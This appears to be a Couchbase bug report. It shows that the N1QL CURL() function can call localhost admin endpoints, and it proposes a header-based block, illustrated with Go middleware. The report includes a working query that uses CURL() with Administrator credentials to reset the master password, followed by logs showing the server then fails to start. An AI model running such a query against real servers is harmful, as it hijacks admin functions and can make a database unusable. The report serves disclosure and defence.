Description
Attack scenario: in what context is CURL running on the server? Can I use CURL with a REST API call to reset the administrator password?
Use a custom header for N1QL CURL: X-N1QL-User-Agent: couchbase/n1ql/1.7.0-N1QL
Each localhost endpoint can then check for this header string and deny access on its end.
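As an added example (not code from this report or from Couchbase), here is what the proposed check looks like on the endpoint side in Go: a small middleware that refuses any request carrying X-N1QL-User-Agent with the couchbase/n1ql/ prefix, wrapped around a stand-in for the changeMasterPassword handler. The header name and value are taken from the proposal above; the middleware, the stand-in handler and the in-memory request are constructed for illustration and are not ns_server code.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Header the query service is proposed to attach to every outbound CURL() request.
// Name and value prefix are from the report; the check is on the prefix so a
// version bump (1.7.0-N1QL, 1.8.0-N1QL, ...) does not silently reopen the endpoint.
const (
	n1qlUserAgentHeader = "X-N1QL-User-Agent"
	n1qlUserAgentPrefix = "couchbase/n1ql/"
)

// isN1QLCurl reports whether the request claims to originate from N1QL CURL().
func isN1QLCurl(r *http.Request) bool {
	return strings.HasPrefix(r.Header.Get(n1qlUserAgentHeader), n1qlUserAgentPrefix)
}

// denyN1QLCurl is hypothetical middleware: it short-circuits with 403 before the
// wrapped handler runs, so the credentials in the request are never honoured.
func denyN1QLCurl(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if isN1QLCurl(r) {
			http.Error(w, "request originated from N1QL CURL(); not authorized", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// changeMasterPassword is a stand-in for /node/controller/changeMasterPassword.
// It only acknowledges a POST; the real endpoint lives in ns_server.
func changeMasterPassword(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	w.WriteHeader(http.StatusOK)
}

// statusFor replays the report's POST (form body and Administrator basic auth)
// against the protected endpoint in memory, with or without the marker header,
// and returns the HTTP status the client would see.
func statusFor(viaN1QLCurl bool) int {
	protected := denyN1QLCurl(http.HandlerFunc(changeMasterPassword))

	req := httptest.NewRequest(http.MethodPost,
		"/node/controller/changeMasterPassword",
		strings.NewReader("newPassword=booyaa")) // constructed request, mirrors the cbq call
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.SetBasicAuth("Administrator", "password")
	if viaN1QLCurl {
		req.Header.Set(n1qlUserAgentHeader, "couchbase/n1ql/1.7.0-N1QL")
	}

	rec := httptest.NewRecorder()
	protected.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	fmt.Println("direct admin POST:   ", statusFor(false)) // 200
	fmt.Println("same POST via CURL():", statusFor(true))  // 403
}
```

The check is only as strong as the guarantee that the query service always adds the header and that a caller's own "header" option cannot strip or override it; it also does nothing about the underlying problem that the request can carry Administrator credentials in the URL, so it should be treated as one layer, not the fix.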
Tested the following:
cbq> select curl("http://Administrator:password@127.0.0.1:8091/node/controller/changeMasterPassword", {"data":"newPassword=booyaa","request":"POST"}) ;
{
    "requestID": "9aab0709-3c7a-4167-909a-0438294fc4dd",
    "signature": {
        "$1": "object"
    },
    "results": [
        {
            "$1": null
        }
    ],
    "status": "success",
    "metrics": {
        "elapsedTime": "15.852872ms",
        "executionTime": "15.836674ms",
        "resultCount": 1,
        "resultSize": 34
    }
}
This should not be authorized.
If I quit Couchbase and then restart it, it gives an error message saying
"Problem Running Couchbase: Couchbase server doesn't seem to be operating properly. Check console logs for more details."
When I look at the logs in babysitter.log:
ns_server:debug,2017-04-19T15:37:13.155-07:00,[babysitter_of_ns_1@127.0.0.1Sending password to gosecrets
ns_server:error,2017-04-19T15:37:13.168-07:00,[babysitter_of_ns_1@127.0.0.1Incorrect master password. Error: {error,
"cipher: message authentication failed"}